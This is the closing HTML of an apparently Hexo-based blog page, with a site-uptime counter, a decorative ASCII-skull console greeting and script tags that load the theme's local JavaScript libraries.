		document.getElementById("sitetime").innerHTML=" 已安全运行"+(diffYears-2)+" 年 "+diffDays+" 天 "+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒";
	}/*因为建站时间还没有一年，就将之注释掉了。需要的可以取消*/
	siteTime();
</script>

<script>
console.log(`%c
. . . . . . . . . . . . . . . . . . . . . . . . . . .
.                                                   .
.                      uuuuuuu                      .
.                  uu$$$$$$$$$$$uu                  .
.               uu$$$$$$$$$$$$$$$$$uu               .
.              u$$$$$$$$$$$$$$$$$$$$$u              .
.             u$$$$$$$$$$$$$$$$$$$$$$$u             .
.            u$$$$$$$$$$$$$$$$$$$$$$$$$u            .
.            u$$$$$$$$$$$$$$$$$$$$$$$$$u            .
.            u$$$$$$"   "$$$"   "$$$$$$u            .
.            "$$$$"      u$u       $$$$"            .
.             $$$u       u$u       u$$$             .
.             $$$u      u$$$u      u$$$             .
.              "$$$$uu$$$   $$$uu$$$$"              .
.               "$$$$$$$"   "$$$$$$$"               .
.                 u$$$$$$$u$$$$$$$u                 .
.                  u$"$"$"$"$"$"$u                  .
.       uuu        $$u$ $ $ $ $u$$       uuu        .
.      u$$$$        $$$$$u$u$u$$$       u$$$$       .
.       $$$$$uu      "$$$$$$$$$"     uu$$$$$$       .
.     u$$$$$$$$$$$uu    """""    uuuu$$$$$$$$$$     .
.     $$$$"""$$$$$$$$$$uuu   uu$$$$$$$$$"""$$$"     .
.      """      ""$$$$$$$$$$$uu ""$"""              .
.                uuuu ""$$$$$$$$$$uuu               .
.       u$$$uuu$$$$$$$$$uu ""$$$$$$$$$$$uuu$$$      .
.       $$$$$$$$$$""""           ""$$$$$$$$$$$"     .
.        "$$$$$"                      ""$$$$""      .
.          $$$"                         $$$$"       .
.                                                   .
.               Welcome to Console ;)               .
. . . . . . . . . . . . . . . . . . . . . . . . . . .`,"color:#9acc14; background:black; font-family: monospace");
</script>
        








      </div>
    </footer>
  </div>

  
  <script color='' opacity='' zIndex='' count='' src="/lib/canvas-nest/canvas-nest-nomobile.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>

<script type="text/javascript" src="\js\FunnyTitle.js"></script>